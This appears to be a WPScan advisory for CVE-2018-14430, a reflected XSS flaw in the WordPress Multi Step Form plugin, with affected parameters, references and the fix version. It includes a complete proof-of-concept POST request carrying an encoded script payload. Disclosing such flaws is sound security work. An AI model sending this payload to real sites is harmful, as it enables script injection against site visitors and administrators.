Multi Step Form <= 1.2.5 - Multiple Unauthenticated Reflected XSS



Description
WordPress Plugin Multi Step Form before 1.2.5 allows remote users to execute JavaScript code through Reflected XSS attacks.

This issue can be exploited by unauthenticated attackers, by the use of CSRF, for example.
Proof of Concept
The following parameters are vulnerable in fw_send_data function:
fw_data[id][1]
fw_data[id][2]
fw_data[id][3]
fw_data[id][4]
email
 
Proof of Concept (PoC):
The following POST request will cause it to display an alert in the browser when it runs:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/2018/07/10/hola-mundo/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 207
Cookie: wp-settings-time-1=1531401661
Connection: close

action=fw_send_email&id=1&fw_data%5BTest%5D%5B0%5D%5B%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&fw_data%5BTest%5D%5B1%5D%5B%5D=2&fw_data%5BTest%5D%5B2%5D%5B%5D=3%403.com&fw_data%5BTest%5D%5B3%5D%5B%5D=2018-07-20&email=3%403.com&nonce=ba16aeb8b0

Affects Plugin

fixed in version 1.2.6

References

CVE 2018-14430
URL https://hackpuntes.com/cve-2018-14430-wordpress-plugin-multi-step-form-125-multiples-xss-reflejados/
URL https://plugins.trac.wordpress.org/changeset/1917500/multi-step-form

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Javier Olmedo
Submitter Website https://hackpuntes.com
Submitter Twitter JJavierOlmedo
Views 1705
Verified Yes
WPVDB ID 9106

Timeline

Publicly Published 2018-07-20 (5 months ago)
Added 2018-07-30 (5 months ago)
Last Updated 2018-08-28 (4 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.